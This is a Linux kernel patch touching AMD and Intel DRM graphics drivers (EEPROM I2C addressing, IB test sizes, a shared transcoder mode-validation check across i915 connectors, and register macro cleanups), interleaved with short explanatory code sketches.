+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.c
+index 4d9eb0137f8c4..d6c4293829aab 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.c
+@@ -79,6 +79,8 @@
+  * That is, for an I2C EEPROM driver everything is controlled by
+  * the "eeprom_addr".
+  *
++ * See also top of amdgpu_ras_eeprom.c.
++ *
+  * P.S. If you need to write, lock and read the Identification Page,
+  * (M24M02-DR device only, which we do not use), change the "7" to
+  * "0xF" in the macro below, and let the client set bit 20 to 1 in
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras_eeprom.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras_eeprom.c
+index 84c241b9a2a13..f5f747cfe90a1 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras_eeprom.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras_eeprom.c
+@@ -33,12 +33,29 @@
+ 
+ #include "amdgpu_reset.h"
+ 
+-#define EEPROM_I2C_MADDR_VEGA20         0x0
+-#define EEPROM_I2C_MADDR_ARCTURUS       0x40000
+-#define EEPROM_I2C_MADDR_ARCTURUS_D342  0x0
+-#define EEPROM_I2C_MADDR_SIENNA_CICHLID 0x0
+-#define EEPROM_I2C_MADDR_ALDEBARAN      0x0
+-#define EEPROM_I2C_MADDR_SMU_13_0_0     (0x54UL << 16)
++/* These are memory addresses as would be seen by one or more EEPROM
++ * chips strung on the I2C bus, usually by manipulating pins 1-3 of a
++ * set of EEPROM devices. They form a continuous memory space.
++ *
++ * The I2C device address includes the device type identifier, 1010b,
++ * which is a reserved value and indicates that this is an I2C EEPROM
++ * device. It also includes the top 3 bits of the 19 bit EEPROM memory
++ * address, namely bits 18, 17, and 16. This makes up the 7 bit
++ * address sent on the I2C bus with bit 0 being the direction bit,
++ * which is not represented here, and sent by the hardware directly.
++ *
++ * For instance,
++ *   50h = 1010000b => device type identifier 1010b, bits 18:16 = 000b, address 0.
++ *   54h = 1010100b => --"--, bits 18:16 = 100b, address 40000h.
++ *   56h = 1010110b => --"--, bits 18:16 = 110b, address 60000h.
++ * Depending on the size of the I2C EEPROM device(s), bits 18:16 may
++ * address memory in a device or a device on the I2C bus, depending on
++ * the status of pins 1-3. See top of amdgpu_eeprom.c.
++ *
++ * The RAS table lives either at address 0 or address 40000h of EEPROM.
++ */
++#define EEPROM_I2C_MADDR_0      0x0
++#define EEPROM_I2C_MADDR_4      0x40000
+ 
+ /*
+  * The 2 macros below represent the actual size in bytes that
+@@ -90,33 +107,23 @@
+ 
+ static bool __is_ras_eeprom_supported(struct amdgpu_device *adev)
+ {
+-	return  adev->asic_type == CHIP_VEGA20 ||
+-		adev->asic_type == CHIP_ARCTURUS ||
+-		adev->asic_type == CHIP_SIENNA_CICHLID ||
+-		adev->asic_type == CHIP_ALDEBARAN;
+-}
+-
+-static bool __get_eeprom_i2c_addr_arct(struct amdgpu_device *adev,
+-				       struct amdgpu_ras_eeprom_control *control)
+-{
+-	struct atom_context *atom_ctx = adev->mode_info.atom_context;
+-
+-	if (!control || !atom_ctx)
++	switch (adev->ip_versions[MP1_HWIP][0]) {
++	case IP_VERSION(11, 0, 2): /* VEGA20 and ARCTURUS */
++	case IP_VERSION(11, 0, 7): /* Sienna cichlid */
++	case IP_VERSION(13, 0, 0):
++	case IP_VERSION(13, 0, 2): /* Aldebaran */
++	case IP_VERSION(13, 0, 6):
++	case IP_VERSION(13, 0, 10):
++		return true;
++	default:
+ 		return false;
+-
+-	if (strnstr(atom_ctx->vbios_version,
+-	            "D342",
+-		    sizeof(atom_ctx->vbios_version)))
+-		control->i2c_address = EEPROM_I2C_MADDR_ARCTURUS_D342;
+-	else
+-		control->i2c_address = EEPROM_I2C_MADDR_ARCTURUS;
+-
+-	return true;
++	}
+ }
+ 
+ static bool __get_eeprom_i2c_addr(struct amdgpu_device *adev,
+ 				  struct amdgpu_ras_eeprom_control *control)
+ {
++	struct atom_context *atom_ctx = adev->mode_info.atom_context;
+ 	u8 i2c_addr;
+ 
+ 	if (!control)
+@@ -137,36 +144,42 @@ static bool __get_eeprom_i2c_addr(struct amdgpu_device *adev,
+ 		return true;
+ 	}
+ 
+-	switch (adev->asic_type) {
+-	case CHIP_VEGA20:
+-		control->i2c_address = EEPROM_I2C_MADDR_VEGA20;
+-		break;
+-
+-	case CHIP_ARCTURUS:
+-		return __get_eeprom_i2c_addr_arct(adev, control);
+-
+-	case CHIP_SIENNA_CICHLID:
+-		control->i2c_address = EEPROM_I2C_MADDR_SIENNA_CICHLID;
+-		break;
+-
+-	case CHIP_ALDEBARAN:
+-		control->i2c_address = EEPROM_I2C_MADDR_ALDEBARAN;
+-		break;
+-
+-	default:
+-		return false;
+-	}
+-
+ 	switch (adev->ip_versions[MP1_HWIP][0]) {
++	case IP_VERSION(11, 0, 2):
++		/* VEGA20 and ARCTURUS */
++		if (adev->asic_type == CHIP_VEGA20)
++			control->i2c_address = EEPROM_I2C_MADDR_0;
++		else if (strnstr(atom_ctx->vbios_version,
++				 "D342",
++				 sizeof(atom_ctx->vbios_version)))
++			control->i2c_address = EEPROM_I2C_MADDR_0;
++		else
++			control->i2c_address = EEPROM_I2C_MADDR_4;
++		return true;
++	case IP_VERSION(11, 0, 7):
++		control->i2c_address = EEPROM_I2C_MADDR_0;
++		return true;
++	case IP_VERSION(13, 0, 2):
++		if (strnstr(atom_ctx->vbios_version, "D673",
++			    sizeof(atom_ctx->vbios_version)))
++			control->i2c_address = EEPROM_I2C_MADDR_4;
++		else
++			control->i2c_address = EEPROM_I2C_MADDR_0;
++		return true;
+ 	case IP_VERSION(13, 0, 0):
+-		control->i2c_address = EEPROM_I2C_MADDR_SMU_13_0_0;
+-		break;
+-
++		if (strnstr(atom_ctx->vbios_pn, "D707",
++			    sizeof(atom_ctx->vbios_pn)))
++			control->i2c_address = EEPROM_I2C_MADDR_0;
++		else
++			control->i2c_address = EEPROM_I2C_MADDR_4;
++		return true;
++	case IP_VERSION(13, 0, 6):
++	case IP_VERSION(13, 0, 10):
++		control->i2c_address = EEPROM_I2C_MADDR_4;
++		return true;
+ 	default:
+-		break;
++		return false;
+ 	}
+-
+-	return true;
+ }
+ 
+ static void
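
As a worked example of the addressing comment introduced above: the 7-bit I2C
device address is just the 1010b type identifier with EEPROM memory-address
bits 18:16 appended. A hypothetical helper, consistent with the 50h/54h/56h
examples in that comment:

	static u8 eeprom_i2c_dev_addr(u32 maddr)
	{
		return 0x50 | ((maddr >> 16) & 0x7);	/* 1010b | bits 18:16 */
	}

	/* eeprom_i2c_dev_addr(EEPROM_I2C_MADDR_0) == 0x50
	 * eeprom_i2c_dev_addr(EEPROM_I2C_MADDR_4) == 0x54 */
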
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 23e7e5126eae6..66a6f7a37ebcf 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -397,7 +397,7 @@ static int gfx_v11_0_ring_test_ib(struct amdgpu_ring *ring, long timeout)
+ 		adev->wb.wb[index] = cpu_to_le32(0xCAFEDEAD);
+ 		cpu_ptr = &adev->wb.wb[index];
+ 
+-		r = amdgpu_ib_get(adev, NULL, 16, AMDGPU_IB_POOL_DIRECT, &ib);
++		r = amdgpu_ib_get(adev, NULL, 20, AMDGPU_IB_POOL_DIRECT, &ib);
+ 		if (r) {
+ 			DRM_ERROR("amdgpu: failed to get ib (%ld).\n", r);
+ 			goto err1;
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v8_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v8_0.c
+index 7f0b18b0d4c48..71ef25425c7f6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v8_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v8_0.c
+@@ -883,8 +883,8 @@ static int gfx_v8_0_ring_test_ib(struct amdgpu_ring *ring, long timeout)
+ 	gpu_addr = adev->wb.gpu_addr + (index * 4);
+ 	adev->wb.wb[index] = cpu_to_le32(0xCAFEDEAD);
+ 	memset(&ib, 0, sizeof(ib));
+-	r = amdgpu_ib_get(adev, NULL, 16,
+-					AMDGPU_IB_POOL_DIRECT, &ib);
++
++	r = amdgpu_ib_get(adev, NULL, 20, AMDGPU_IB_POOL_DIRECT, &ib);
+ 	if (r)
+ 		goto err1;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+index fe371022e5104..84ca601f7d5f3 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+@@ -1034,8 +1034,8 @@ static int gfx_v9_0_ring_test_ib(struct amdgpu_ring *ring, long timeout)
+ 	gpu_addr = adev->wb.gpu_addr + (index * 4);
+ 	adev->wb.wb[index] = cpu_to_le32(0xCAFEDEAD);
+ 	memset(&ib, 0, sizeof(ib));
+-	r = amdgpu_ib_get(adev, NULL, 16,
+-					AMDGPU_IB_POOL_DIRECT, &ib);
++
++	r = amdgpu_ib_get(adev, NULL, 20, AMDGPU_IB_POOL_DIRECT, &ib);
+ 	if (r)
+ 		goto err1;
+ 
+diff --git a/drivers/gpu/drm/bridge/Kconfig b/drivers/gpu/drm/bridge/Kconfig
+index 57946d80b02db..12baf9ba03c96 100644
+--- a/drivers/gpu/drm/bridge/Kconfig
++++ b/drivers/gpu/drm/bridge/Kconfig
+@@ -309,6 +309,7 @@ config DRM_TOSHIBA_TC358768
+ 	select REGMAP_I2C
+ 	select DRM_PANEL
+ 	select DRM_MIPI_DSI
++	select VIDEOMODE_HELPERS
+ 	help
+ 	  Toshiba TC358768AXBG/TC358778XBG DSI bridge chip driver.
+ 
+diff --git a/drivers/gpu/drm/i915/display/icl_dsi.c b/drivers/gpu/drm/i915/display/icl_dsi.c
+index 8219310025de5..f7422f0cf579d 100644
+--- a/drivers/gpu/drm/i915/display/icl_dsi.c
++++ b/drivers/gpu/drm/i915/display/icl_dsi.c
+@@ -1500,6 +1500,13 @@ static void gen11_dsi_post_disable(struct intel_atomic_state *state,
+ static enum drm_mode_status gen11_dsi_mode_valid(struct drm_connector *connector,
+ 						 struct drm_display_mode *mode)
+ {
++	struct drm_i915_private *i915 = to_i915(connector->dev);
++	enum drm_mode_status status;
++
++	status = intel_cpu_transcoder_mode_valid(i915, mode);
++	if (status != MODE_OK)
++		return status;
++
+ 	/* FIXME: DSC? */
+ 	return intel_dsi_mode_valid(connector, mode);
+ }
+diff --git a/drivers/gpu/drm/i915/display/intel_crt.c b/drivers/gpu/drm/i915/display/intel_crt.c
+index 4a8ff2f976085..e60b2cf84b851 100644
+--- a/drivers/gpu/drm/i915/display/intel_crt.c
++++ b/drivers/gpu/drm/i915/display/intel_crt.c
+@@ -343,8 +343,13 @@ intel_crt_mode_valid(struct drm_connector *connector,
+ 	struct drm_device *dev = connector->dev;
+ 	struct drm_i915_private *dev_priv = to_i915(dev);
+ 	int max_dotclk = dev_priv->max_dotclk_freq;
++	enum drm_mode_status status;
+ 	int max_clock;
+ 
++	status = intel_cpu_transcoder_mode_valid(dev_priv, mode);
++	if (status != MODE_OK)
++		return status;
++
+ 	if (mode->flags & DRM_MODE_FLAG_DBLSCAN)
+ 		return MODE_NO_DBLESCAN;
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index 96e679a176e94..1777a12f2f421 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -8229,6 +8229,16 @@ intel_mode_valid(struct drm_device *dev,
+ 	    mode->vtotal > vtotal_max)
+ 		return MODE_V_ILLEGAL;
+ 
++	return MODE_OK;
++}
++
++enum drm_mode_status intel_cpu_transcoder_mode_valid(struct drm_i915_private *dev_priv,
++						     const struct drm_display_mode *mode)
++{
++	/*
++	 * Additional transcoder timing limits,
++	 * excluding BXT/GLK DSI transcoders.
++	 */
+ 	if (DISPLAY_VER(dev_priv) >= 5) {
+ 		if (mode->hdisplay < 64 ||
+ 		    mode->htotal - mode->hdisplay < 32)
+diff --git a/drivers/gpu/drm/i915/display/intel_display.h b/drivers/gpu/drm/i915/display/intel_display.h
+index 884e8e67b17c7..b4f941674357b 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.h
++++ b/drivers/gpu/drm/i915/display/intel_display.h
+@@ -554,6 +554,9 @@ enum drm_mode_status
+ intel_mode_valid_max_plane_size(struct drm_i915_private *dev_priv,
+ 				const struct drm_display_mode *mode,
+ 				bool bigjoiner);
++enum drm_mode_status
++intel_cpu_transcoder_mode_valid(struct drm_i915_private *i915,
++				const struct drm_display_mode *mode);
+ enum phy intel_port_to_phy(struct drm_i915_private *i915, enum port port);
+ bool is_trans_port_sync_mode(const struct intel_crtc_state *state);
+ bool intel_crtc_is_bigjoiner_slave(const struct intel_crtc_state *crtc_state);
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index 594ea037050a9..5970f4149090f 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -973,8 +973,9 @@ intel_dp_mode_valid(struct drm_connector *_connector,
+ 	enum drm_mode_status status;
+ 	bool dsc = false, bigjoiner = false;
+ 
+-	if (mode->flags & DRM_MODE_FLAG_DBLSCAN)
+-		return MODE_NO_DBLESCAN;
++	status = intel_cpu_transcoder_mode_valid(dev_priv, mode);
++	if (status != MODE_OK)
++		return status;
+ 
+ 	if (mode->flags & DRM_MODE_FLAG_DBLCLK)
+ 		return MODE_H_ILLEGAL;
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_mst.c b/drivers/gpu/drm/i915/display/intel_dp_mst.c
+index 9a6822256ddf6..eec32f682012c 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_mst.c
++++ b/drivers/gpu/drm/i915/display/intel_dp_mst.c
+@@ -703,6 +703,10 @@ intel_dp_mst_mode_valid_ctx(struct drm_connector *connector,
+ 		return 0;
+ 	}
+ 
++	*status = intel_cpu_transcoder_mode_valid(dev_priv, mode);
++	if (*status != MODE_OK)
++		return 0;
++
+ 	if (mode->flags & DRM_MODE_FLAG_DBLSCAN) {
+ 		*status = MODE_NO_DBLESCAN;
+ 		return 0;
+diff --git a/drivers/gpu/drm/i915/display/intel_dvo.c b/drivers/gpu/drm/i915/display/intel_dvo.c
+index 5572e43026e4d..511c589070087 100644
+--- a/drivers/gpu/drm/i915/display/intel_dvo.c
++++ b/drivers/gpu/drm/i915/display/intel_dvo.c
+@@ -225,10 +225,16 @@ intel_dvo_mode_valid(struct drm_connector *connector,
+ {
+ 	struct intel_connector *intel_connector = to_intel_connector(connector);
+ 	struct intel_dvo *intel_dvo = intel_attached_dvo(intel_connector);
++	struct drm_i915_private *i915 = to_i915(intel_connector->base.dev);
+ 	const struct drm_display_mode *fixed_mode =
+ 		intel_panel_fixed_mode(intel_connector, mode);
+ 	int max_dotclk = to_i915(connector->dev)->max_dotclk_freq;
+ 	int target_clock = mode->clock;
++	enum drm_mode_status status;
++
++	status = intel_cpu_transcoder_mode_valid(i915, mode);
++	if (status != MODE_OK)
++		return status;
+ 
+ 	if (mode->flags & DRM_MODE_FLAG_DBLSCAN)
+ 		return MODE_NO_DBLESCAN;
+diff --git a/drivers/gpu/drm/i915/display/intel_hdmi.c b/drivers/gpu/drm/i915/display/intel_hdmi.c
+index 7816b2a33feeb..2600019fc8b96 100644
+--- a/drivers/gpu/drm/i915/display/intel_hdmi.c
++++ b/drivers/gpu/drm/i915/display/intel_hdmi.c
+@@ -1987,8 +1987,9 @@ intel_hdmi_mode_valid(struct drm_connector *connector,
+ 	bool has_hdmi_sink = intel_has_hdmi_sink(hdmi, connector->state);
+ 	bool ycbcr_420_only;
+ 
+-	if (mode->flags & DRM_MODE_FLAG_DBLSCAN)
+-		return MODE_NO_DBLESCAN;
++	status = intel_cpu_transcoder_mode_valid(dev_priv, mode);
++	if (status != MODE_OK)
++		return status;
+ 
+ 	if ((mode->flags & DRM_MODE_FLAG_3D_MASK) == DRM_MODE_FLAG_3D_FRAME_PACKING)
+ 		clock *= 2;
+diff --git a/drivers/gpu/drm/i915/display/intel_lvds.c b/drivers/gpu/drm/i915/display/intel_lvds.c
+index a749a5a66d624..40b5d3d3c7e14 100644
+--- a/drivers/gpu/drm/i915/display/intel_lvds.c
++++ b/drivers/gpu/drm/i915/display/intel_lvds.c
+@@ -92,9 +92,9 @@ bool intel_lvds_port_enabled(struct drm_i915_private *dev_priv,
+ 
+ 	/* asserts want to know the pipe even if the port is disabled */
+ 	if (HAS_PCH_CPT(dev_priv))
+-		*pipe = (val & LVDS_PIPE_SEL_MASK_CPT) >> LVDS_PIPE_SEL_SHIFT_CPT;
++		*pipe = REG_FIELD_GET(LVDS_PIPE_SEL_MASK_CPT, val);
+ 	else
+-		*pipe = (val & LVDS_PIPE_SEL_MASK) >> LVDS_PIPE_SEL_SHIFT;
++		*pipe = REG_FIELD_GET(LVDS_PIPE_SEL_MASK, val);
+ 
+ 	return val & LVDS_PORT_EN;
+ }
+@@ -389,11 +389,16 @@ intel_lvds_mode_valid(struct drm_connector *connector,
+ 		      struct drm_display_mode *mode)
+ {
+ 	struct intel_connector *intel_connector = to_intel_connector(connector);
++	struct drm_i915_private *i915 = to_i915(intel_connector->base.dev);
+ 	const struct drm_display_mode *fixed_mode =
+ 		intel_panel_fixed_mode(intel_connector, mode);
+ 	int max_pixclk = to_i915(connector->dev)->max_dotclk_freq;
+ 	enum drm_mode_status status;
+ 
++	status = intel_cpu_transcoder_mode_valid(i915, mode);
++	if (status != MODE_OK)
++		return status;
++
+ 	if (mode->flags & DRM_MODE_FLAG_DBLSCAN)
+ 		return MODE_NO_DBLESCAN;
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_sdvo.c b/drivers/gpu/drm/i915/display/intel_sdvo.c
+index 2c2e0f041f869..8294dddfd9de8 100644
+--- a/drivers/gpu/drm/i915/display/intel_sdvo.c
++++ b/drivers/gpu/drm/i915/display/intel_sdvo.c
+@@ -115,7 +115,6 @@ struct intel_sdvo {
+ 
+ 	enum port port;
+ 
+-	bool has_hdmi_monitor;
+ 	bool has_hdmi_audio;
+ 
+ 	/* DDC bus used by this SDVO encoder */
+@@ -1278,10 +1277,13 @@ static void i9xx_adjust_sdvo_tv_clock(struct intel_crtc_state *pipe_config)
+ 	pipe_config->clock_set = true;
+ }
+ 
+-static bool intel_has_hdmi_sink(struct intel_sdvo *sdvo,
++static bool intel_has_hdmi_sink(struct intel_sdvo_connector *intel_sdvo_connector,
+ 				const struct drm_connector_state *conn_state)
+ {
+-	return sdvo->has_hdmi_monitor &&
++	struct drm_connector *connector = conn_state->connector;
++
++	return intel_sdvo_connector->is_hdmi &&
++		connector->display_info.is_hdmi &&
+ 		READ_ONCE(to_intel_digital_connector_state(conn_state)->force_audio) != HDMI_AUDIO_OFF_DVI;
+ }
+ 
+@@ -1360,7 +1362,7 @@ static int intel_sdvo_compute_config(struct intel_encoder *encoder,
+ 	pipe_config->pixel_multiplier =
+ 		intel_sdvo_get_pixel_multiplier(adjusted_mode);
+ 
+-	pipe_config->has_hdmi_sink = intel_has_hdmi_sink(intel_sdvo, conn_state);
++	pipe_config->has_hdmi_sink = intel_has_hdmi_sink(intel_sdvo_connector, conn_state);
+ 
+ 	if (pipe_config->has_hdmi_sink) {
+ 		if (intel_sdvo_state->base.force_audio == HDMI_AUDIO_AUTO)
+@@ -1871,13 +1873,19 @@ static enum drm_mode_status
+ intel_sdvo_mode_valid(struct drm_connector *connector,
+ 		      struct drm_display_mode *mode)
+ {
++	struct drm_i915_private *i915 = to_i915(connector->dev);
+ 	struct intel_sdvo *intel_sdvo = intel_attached_sdvo(to_intel_connector(connector));
+ 	struct intel_sdvo_connector *intel_sdvo_connector =
+ 		to_intel_sdvo_connector(connector);
+-	int max_dotclk = to_i915(connector->dev)->max_dotclk_freq;
+-	bool has_hdmi_sink = intel_has_hdmi_sink(intel_sdvo, connector->state);
++	bool has_hdmi_sink = intel_has_hdmi_sink(intel_sdvo_connector, connector->state);
++	int max_dotclk = i915->max_dotclk_freq;
++	enum drm_mode_status status;
+ 	int clock = mode->clock;
+ 
++	status = intel_cpu_transcoder_mode_valid(i915, mode);
++	if (status != MODE_OK)
++		return status;
++
+ 	if (mode->flags & DRM_MODE_FLAG_DBLSCAN)
+ 		return MODE_NO_DBLESCAN;
+ 
+@@ -2064,7 +2072,6 @@ intel_sdvo_tmds_sink_detect(struct drm_connector *connector)
+ 		if (edid->input & DRM_EDID_INPUT_DIGITAL) {
+ 			status = connector_status_connected;
+ 			if (intel_sdvo_connector->is_hdmi) {
+-				intel_sdvo->has_hdmi_monitor = drm_detect_hdmi_monitor(edid);
+ 				intel_sdvo->has_hdmi_audio = drm_detect_monitor_audio(edid);
+ 			}
+ 		} else
+@@ -2116,7 +2123,6 @@ intel_sdvo_detect(struct drm_connector *connector, bool force)
+ 
+ 	intel_sdvo->attached_output = response;
+ 
+-	intel_sdvo->has_hdmi_monitor = false;
+ 	intel_sdvo->has_hdmi_audio = false;
+ 
+ 	if ((intel_sdvo_connector->output_flag & response) == 0)
+diff --git a/drivers/gpu/drm/i915/display/intel_tv.c b/drivers/gpu/drm/i915/display/intel_tv.c
+index dcf89d701f0f6..fb25be800e753 100644
+--- a/drivers/gpu/drm/i915/display/intel_tv.c
++++ b/drivers/gpu/drm/i915/display/intel_tv.c
+@@ -956,8 +956,14 @@ static enum drm_mode_status
+ intel_tv_mode_valid(struct drm_connector *connector,
+ 		    struct drm_display_mode *mode)
+ {
++	struct drm_i915_private *i915 = to_i915(connector->dev);
+ 	const struct tv_mode *tv_mode = intel_tv_mode_find(connector->state);
+-	int max_dotclk = to_i915(connector->dev)->max_dotclk_freq;
++	int max_dotclk = i915->max_dotclk_freq;
++	enum drm_mode_status status;
++
++	status = intel_cpu_transcoder_mode_valid(i915, mode);
++	if (status != MODE_OK)
++		return status;
+ 
+ 	if (mode->flags & DRM_MODE_FLAG_DBLSCAN)
+ 		return MODE_NO_DBLESCAN;
+diff --git a/drivers/gpu/drm/i915/display/vlv_dsi.c b/drivers/gpu/drm/i915/display/vlv_dsi.c
+index 00c80f29ad999..114088ca59ed4 100644
+--- a/drivers/gpu/drm/i915/display/vlv_dsi.c
++++ b/drivers/gpu/drm/i915/display/vlv_dsi.c
+@@ -1627,9 +1627,25 @@ static const struct drm_encoder_funcs intel_dsi_funcs = {
+ 	.destroy = intel_dsi_encoder_destroy,
+ };
+ 
++static enum drm_mode_status vlv_dsi_mode_valid(struct drm_connector *connector,
++					       struct drm_display_mode *mode)
++{
++	struct drm_i915_private *i915 = to_i915(connector->dev);
++
++	if (IS_VALLEYVIEW(i915) || IS_CHERRYVIEW(i915)) {
++		enum drm_mode_status status;
++
++		status = intel_cpu_transcoder_mode_valid(i915, mode);
++		if (status != MODE_OK)
++			return status;
++	}
++
++	return intel_dsi_mode_valid(connector, mode);
++}
++
+ static const struct drm_connector_helper_funcs intel_dsi_connector_helper_funcs = {
+ 	.get_modes = intel_dsi_get_modes,
+-	.mode_valid = intel_dsi_mode_valid,
++	.mode_valid = vlv_dsi_mode_valid,
+ 	.atomic_check = intel_digital_connector_atomic_check,
+ };
+ 
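
The common thread in the LVDS, SDVO, TV and DSI hunks above is ordering: each
connector's .mode_valid hook now calls intel_cpu_transcoder_mode_valid() to
reject modes the CPU transcoder cannot generate before applying its own
connector-specific limits. A minimal userspace sketch of that check-chaining,
with trimmed stand-ins for the DRM types (the 300 MHz cap and the enum values
are illustrative, not the driver's real limits):

#include <stdio.h>

enum mode_status { MODE_OK, MODE_CLOCK_HIGH, MODE_NO_DBLESCAN };

struct display_mode {
	int clock_khz;
	int dblscan;
};

/* stand-in for intel_cpu_transcoder_mode_valid(): shared platform limit */
static enum mode_status transcoder_mode_valid(const struct display_mode *m)
{
	return m->clock_khz <= 300000 ? MODE_OK : MODE_CLOCK_HIGH;
}

static enum mode_status connector_mode_valid(const struct display_mode *m)
{
	enum mode_status status = transcoder_mode_valid(m);

	if (status != MODE_OK)		/* shared platform check first */
		return status;
	if (m->dblscan)			/* then per-connector rules */
		return MODE_NO_DBLESCAN;
	return MODE_OK;
}

int main(void)
{
	struct display_mode m = { .clock_khz = 600000, .dblscan = 0 };

	printf("%d\n", connector_mode_valid(&m));	/* 1 == MODE_CLOCK_HIGH */
	return 0;
}

Hoisting the shared check to the front of every hook keeps individual
connectors from duplicating (or forgetting) it, which is the bug class these
hunks close.
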
+diff --git a/drivers/gpu/drm/i915/i915_reg.h b/drivers/gpu/drm/i915/i915_reg.h
+index 25015996f627a..c6766704340eb 100644
+--- a/drivers/gpu/drm/i915/i915_reg.h
++++ b/drivers/gpu/drm/i915/i915_reg.h
+@@ -2681,52 +2681,50 @@
+  * Enables the LVDS port.  This bit must be set before DPLLs are enabled, as
+  * the DPLL semantics change when the LVDS is assigned to that pipe.
+  */
+-#define   LVDS_PORT_EN			(1 << 31)
++#define   LVDS_PORT_EN			REG_BIT(31)
+ /* Selects pipe B for LVDS data.  Must be set on pre-965. */
+-#define   LVDS_PIPE_SEL_SHIFT		30
+-#define   LVDS_PIPE_SEL_MASK		(1 << 30)
+-#define   LVDS_PIPE_SEL(pipe)		((pipe) << 30)
+-#define   LVDS_PIPE_SEL_SHIFT_CPT	29
+-#define   LVDS_PIPE_SEL_MASK_CPT	(3 << 29)
+-#define   LVDS_PIPE_SEL_CPT(pipe)	((pipe) << 29)
++#define   LVDS_PIPE_SEL_MASK		REG_BIT(30)
++#define   LVDS_PIPE_SEL(pipe)		REG_FIELD_PREP(LVDS_PIPE_SEL_MASK, (pipe))
++#define   LVDS_PIPE_SEL_MASK_CPT	REG_GENMASK(30, 29)
++#define   LVDS_PIPE_SEL_CPT(pipe)	REG_FIELD_PREP(LVDS_PIPE_SEL_MASK_CPT, (pipe))
+ /* LVDS dithering flag on 965/g4x platform */
+-#define   LVDS_ENABLE_DITHER		(1 << 25)
++#define   LVDS_ENABLE_DITHER		REG_BIT(25)
+ /* LVDS sync polarity flags. Set to invert (i.e. negative) */
+-#define   LVDS_VSYNC_POLARITY		(1 << 21)
+-#define   LVDS_HSYNC_POLARITY		(1 << 20)
++#define   LVDS_VSYNC_POLARITY		REG_BIT(21)
++#define   LVDS_HSYNC_POLARITY		REG_BIT(20)
+ 
+ /* Enable border for unscaled (or aspect-scaled) display */
+-#define   LVDS_BORDER_ENABLE		(1 << 15)
++#define   LVDS_BORDER_ENABLE		REG_BIT(15)
+ /*
+  * Enables the A0-A2 data pairs and CLKA, containing 18 bits of color data per
+  * pixel.
+  */
+-#define   LVDS_A0A2_CLKA_POWER_MASK	(3 << 8)
+-#define   LVDS_A0A2_CLKA_POWER_DOWN	(0 << 8)
+-#define   LVDS_A0A2_CLKA_POWER_UP	(3 << 8)
++#define   LVDS_A0A2_CLKA_POWER_MASK	REG_GENMASK(9, 8)
++#define   LVDS_A0A2_CLKA_POWER_DOWN	REG_FIELD_PREP(LVDS_A0A2_CLKA_POWER_MASK, 0)
++#define   LVDS_A0A2_CLKA_POWER_UP	REG_FIELD_PREP(LVDS_A0A2_CLKA_POWER_MASK, 3)
+ /*
+  * Controls the A3 data pair, which contains the additional LSBs for 24 bit
+  * mode.  Only enabled if LVDS_A0A2_CLKA_POWER_UP also indicates it should be
+  * on.
+  */
+-#define   LVDS_A3_POWER_MASK		(3 << 6)
+-#define   LVDS_A3_POWER_DOWN		(0 << 6)
+-#define   LVDS_A3_POWER_UP		(3 << 6)
++#define   LVDS_A3_POWER_MASK		REG_GENMASK(7, 6)
++#define   LVDS_A3_POWER_DOWN		REG_FIELD_PREP(LVDS_A3_POWER_MASK, 0)
++#define   LVDS_A3_POWER_UP		REG_FIELD_PREP(LVDS_A3_POWER_MASK, 3)
+ /*
+  * Controls the CLKB pair.  This should only be set when LVDS_B0B3_POWER_UP
+  * is set.
+  */
+-#define   LVDS_CLKB_POWER_MASK		(3 << 4)
+-#define   LVDS_CLKB_POWER_DOWN		(0 << 4)
+-#define   LVDS_CLKB_POWER_UP		(3 << 4)
++#define   LVDS_CLKB_POWER_MASK		REG_GENMASK(5, 4)
++#define   LVDS_CLKB_POWER_DOWN		REG_FIELD_PREP(LVDS_CLKB_POWER_MASK, 0)
++#define   LVDS_CLKB_POWER_UP		REG_FIELD_PREP(LVDS_CLKB_POWER_MASK, 3)
+ /*
+  * Controls the B0-B3 data pairs.  This must be set to match the DPLL p2
+  * setting for whether we are in dual-channel mode.  The B3 pair will
+  * additionally only be powered up when LVDS_A3_POWER_UP is set.
+  */
+-#define   LVDS_B0B3_POWER_MASK		(3 << 2)
+-#define   LVDS_B0B3_POWER_DOWN		(0 << 2)
+-#define   LVDS_B0B3_POWER_UP		(3 << 2)
++#define   LVDS_B0B3_POWER_MASK		REG_GENMASK(3, 2)
++#define   LVDS_B0B3_POWER_DOWN		REG_FIELD_PREP(LVDS_B0B3_POWER_MASK, 0)
++#define   LVDS_B0B3_POWER_UP		REG_FIELD_PREP(LVDS_B0B3_POWER_MASK, 3)
+ 
+ /* Video Data Island Packet control */
+ #define VIDEO_DIP_DATA		_MMIO(0x61178)
+@@ -6461,7 +6459,7 @@
+ #define FDI_PLL_CTL_2           _MMIO(0xfe004)
